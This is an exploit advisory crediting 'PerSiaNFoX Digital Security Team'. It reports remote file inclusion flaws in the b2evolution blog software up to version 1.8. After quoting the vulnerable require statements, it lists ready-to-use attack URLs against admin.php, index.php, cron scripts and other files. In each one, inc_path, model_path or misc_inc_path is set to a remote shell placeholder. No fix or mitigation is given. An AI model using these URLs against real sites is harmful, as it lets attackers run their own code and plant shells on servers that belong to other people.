******************************************************************************* *** *** *** *** *** *** *** PerSiaNFoX DigitaL SecuritY TeaM *** *** *** *** *** *** *** ******************************************************************************* <# b2evolution<= 1.8 Remote File Include Vulnerabilities <# Script.............. : b2evolution <# Discovered By.... : Root3r_H3ll <# Location .......... : Iran <# Class.............. : Remote <# Original Advisory : http://Www.PersainFox.com <# We ArE : Root3r_H3LL , Arash.RJ <#Spical TNX HB Team , All My Freinds ------------------------------------------------------------------------------------------------------------- < # CodE :require $inc_path.'_blog_main.inc.php' < #Expolit : < #http://Www.Site.CoM/[Path]/blogs/admin.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/index.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/default.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/multiblogs.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/summary.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/cron/getmail.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/cron/cron_exec.php?inc_path=Sh3ll < #http://Www.Site.CoM/[Path]/blogs/cron/cron_exec.php?model_path=Sh3ll < # CodE : require $misc_inc_path.'_log.class.php' < #Expolit : < #http://Www.Site.coM/[Path]/gettext/ststicfiles.php?misc_inc_path= Sh3ll